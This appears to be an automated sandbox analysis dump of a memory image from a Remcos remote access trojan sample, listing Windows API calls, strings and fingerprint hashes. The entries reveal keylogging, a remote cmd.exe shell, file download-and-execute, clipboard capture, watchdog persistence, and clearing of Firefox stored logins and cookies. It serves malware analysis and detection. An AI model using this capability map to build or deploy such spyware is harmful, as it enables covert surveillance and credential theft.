                        • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB6
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                        • String ID:
                        • API String ID: 3658366068-0
                        • Opcode ID: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                        • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                        • Opcode Fuzzy Hash: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                        • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58

                        Control-flow Graph

                        APIs
                        • GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
                        • _free.LIBCMT ref: 004457E3
                        • _free.LIBCMT ref: 0044580A
                        • SetLastError.KERNEL32(00000000), ref: 00445817
                        • SetLastError.KERNEL32(00000000), ref: 00445820
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free
                        • String ID:
                        • API String ID: 3170660625-0
                        • Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                        • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                        • Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                        • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D

                        Control-flow Graph

                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                        • GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID:
                        • API String ID: 3177248105-0
                        • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                        • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                        • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                        • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8

                        Control-flow Graph

                        APIs
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00445A59
                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00445A66
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc__crt_fast_encode_pointer
                        • String ID:
                        • API String ID: 2279764990-0
                        • Opcode ID: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                        • Instruction ID: f797c493580bcbb57e031b514bcf368a6941c3076375826e2c1e25af396318bd
                        • Opcode Fuzzy Hash: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                        • Instruction Fuzzy Hash: AA113A37A009319BAF21DE69ECC086B7391AB847247164332FC15BB346E634EC0286E9

                        Control-flow Graph

                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                        • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                        • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                        • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D

                        Control-flow Graph

                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                        • Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
                        • Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                        • Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD

                        Control-flow Graph

                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                        • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                        • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                        • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD
                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                          • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                          • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                          • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                        • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                        • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                        • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                        • API String ID: 3018269243-1736093966
                        • Opcode ID: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                        • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                        • Opcode Fuzzy Hash: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                        • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                        APIs
                        • SetEvent.KERNEL32(?,?), ref: 00406D4A
                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
                        • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
                          • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                          • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                          • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                          • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                          • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                          • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                          • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
                        • DeleteFileA.KERNEL32(?), ref: 0040768E
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                        • API String ID: 1385304114-1507758755
                        • Opcode ID: 486b9b13a9e0af661d0ec35c4c2a5e664efc39ece2783de0a02d2c3891ac1a86
                        • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
                        • Opcode Fuzzy Hash: 486b9b13a9e0af661d0ec35c4c2a5e664efc39ece2783de0a02d2c3891ac1a86
                        • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 004056C6
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        • __Init_thread_footer.LIBCMT ref: 00405703
                        • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                        • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                          • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                        • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                        • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                        • CloseHandle.KERNEL32 ref: 00405A03
                        • CloseHandle.KERNEL32 ref: 00405A0B
                        • CloseHandle.KERNEL32 ref: 00405A1D
                        • CloseHandle.KERNEL32 ref: 00405A25
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                        • String ID: SystemDrive$cmd.exe
                        • API String ID: 2994406822-3633465311
                        • Opcode ID: 2147a93f0d5a00cb25f6f491f58970720c4d85058948b83edc3bb2c9f8c33444
                        • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                        • Opcode Fuzzy Hash: 2147a93f0d5a00cb25f6f491f58970720c4d85058948b83edc3bb2c9f8c33444
                        • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                        APIs
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                        • FindClose.KERNEL32(00000000), ref: 0040AB0A
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                        • FindClose.KERNEL32(00000000), ref: 0040AC53
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$CloseFile$FirstNext
                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                        • API String ID: 1164774033-3681987949
                        • Opcode ID: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                        • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                        • Opcode Fuzzy Hash: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                        • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                        APIs
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
                        • FindClose.KERNEL32(00000000), ref: 0040AD0A
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
                        • FindClose.KERNEL32(00000000), ref: 0040ADF0
                        • FindClose.KERNEL32(00000000), ref: 0040AE11
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$Close$File$FirstNext
                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                        • API String ID: 3527384056-432212279
                        • Opcode ID: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                        • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
                        • Opcode Fuzzy Hash: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                        • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
                        APIs
                        • OpenClipboard.USER32 ref: 00414EC2
                        • EmptyClipboard.USER32 ref: 00414ED0
                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
                        • GlobalLock.KERNEL32(00000000), ref: 00414EF9
                        • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
                        • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
                        • CloseClipboard.USER32 ref: 00414F55
                        • OpenClipboard.USER32 ref: 00414F5C
                        • GetClipboardData.USER32(0000000D), ref: 00414F6C
                        • GlobalLock.KERNEL32(00000000), ref: 00414F75
                        • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                        • CloseClipboard.USER32 ref: 00414F84
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                        • String ID:
                        • API String ID: 3520204547-0
                        • Opcode ID: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                        • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
                        • Opcode Fuzzy Hash: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                        • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0$1$2$3$4$5$6$7
                        • API String ID: 0-3177665633
                        • Opcode ID: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                        • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                        • Opcode Fuzzy Hash: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                        • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                        APIs
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                        • GetLastError.KERNEL32 ref: 00418771
                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                        • String ID:
                        • API String ID: 3587775597-0
                        • Opcode ID: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                        • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                        • Opcode Fuzzy Hash: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                        • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                        • FindClose.KERNEL32(00000000), ref: 0040B3BE
                        • FindClose.KERNEL32(00000000), ref: 0040B3E9
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$CloseFile$FirstNext
                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                        • API String ID: 1164774033-405221262
                        • Opcode ID: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                        • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                        • Opcode Fuzzy Hash: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                        • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125
                          • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                        • GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                        • String ID:
                        • API String ID: 2341273852-0
                        • Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                        • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                        • Opcode Fuzzy Hash: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                        • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                        APIs
                          • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                        • SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                        • GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                        • SetLastError.KERNEL32(0000000E), ref: 0041082E
                          • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718
                        • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
                        • HeapAlloc.KERNEL32(00000000), ref: 0041087C
                        • SetLastError.KERNEL32(0000045A), ref: 0041098F
                          • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
                          • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                        • String ID: $.F
                        • API String ID: 3950776272-1421728423
                        • Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                        • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                        • Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                        • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                        APIs
                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                        • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                        • GetLastError.KERNEL32 ref: 00409375
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                        • TranslateMessage.USER32(?), ref: 004093D2
                        • DispatchMessageA.USER32(?), ref: 004093DD
                        Strings
                        • Keylogger initialization failure: error , xrefs: 00409389
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                        • String ID: Keylogger initialization failure: error
                        • API String ID: 3219506041-952744263
                        • Opcode ID: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                        • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                        • Opcode Fuzzy Hash: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                        • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
                        APIs
                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                        • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressCloseCreateLibraryLoadProcsend
                        • String ID: SHDeleteKeyW$Shlwapi.dll
                        • API String ID: 2127411465-314212984
                        • Opcode ID: 3a8f36ea34958f1437b96a761794d04628548da7921348726e3bd1b1d4fd3bc5
                        • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                        • Opcode Fuzzy Hash: 3a8f36ea34958f1437b96a761794d04628548da7921348726e3bd1b1d4fd3bc5
                        • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                        APIs
                        • _free.LIBCMT ref: 00446741
                        • _free.LIBCMT ref: 00446765
                        • _free.LIBCMT ref: 004468EC
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                        • _free.LIBCMT ref: 00446AB8
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                        • String ID:
                        • API String ID: 314583886-0
